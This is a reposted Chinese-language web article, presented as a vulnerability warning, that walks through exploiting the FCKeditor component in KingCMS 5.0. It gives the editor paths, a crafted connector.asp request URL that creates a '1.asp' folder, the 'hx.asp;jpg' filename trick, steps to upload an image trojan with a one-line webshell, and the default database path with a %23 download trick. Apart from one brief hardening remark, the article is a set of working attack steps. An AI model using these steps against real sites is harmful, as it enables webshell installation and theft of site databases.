kingcms 5.0 漏洞漏洞預警 -電腦資料

電腦資料 時間:2019-01-01 我要投稿
【clearvueentertainment.com - 電腦資料】

   

    1,

kingcms 5.0 漏洞漏洞預警

。kingcms 5.0 fckeditor的默認路徑在

    admin/system/editor/FCKeditor/editor/fckeditor.Html

    把本地的馬命名為 hx.asp;jpg 注意看 jpg前面沒有點了..

    OK了..其實以后做站結合fckeditor這類的編輯器..最好加個驗證..只有管理才能訪問..這樣或者比較好吧

    2。編輯器路徑:

    /admin/system/editor/

    利用方式:訪問

    http://www.myhack58.com/admin/system/editor/FCKeditor/editor/filemanager/connectors/asp/connector.asp?Command=CreateFolder&Type=Image&CurrentFolder=/1.asp&NewFolderName=qing.asp

    后在

    /up_files/image/

    目錄下創(chuàng)建一個明文1.asp的文件夾,

電腦資料

kingcms 5.0 漏洞漏洞預警》(http://clearvueentertainment.com)。

    然后訪問

    http://www.myhack58.com/admin/system/editor/FCKeditor/editor/filemanager/browser/default/browser.html?Type=Image&Connector=../../connectors/asp/connector.asp

    ,選擇剛創(chuàng)建的1.asp文件夾并上傳圖片木馬,可以上傳包含一句話內(nèi)容的圖片,然后使用一句話客戶端連接。

    3。該系統(tǒng)后臺也是比較脆弱的,若能成功登陸后臺拿webshell比較簡單,后臺中有個webftp的功能,可以上傳任意文件。默認數(shù)據(jù)庫地址為/db/King#Content#Management#System.mdb,下載的時候將#替換成%23后下載。

    有很多存在FCKEDITOR編輯器的基本存在該漏洞 與其說是KINGCMS的漏洞不如說是FCKEDITOR的漏洞

最新文章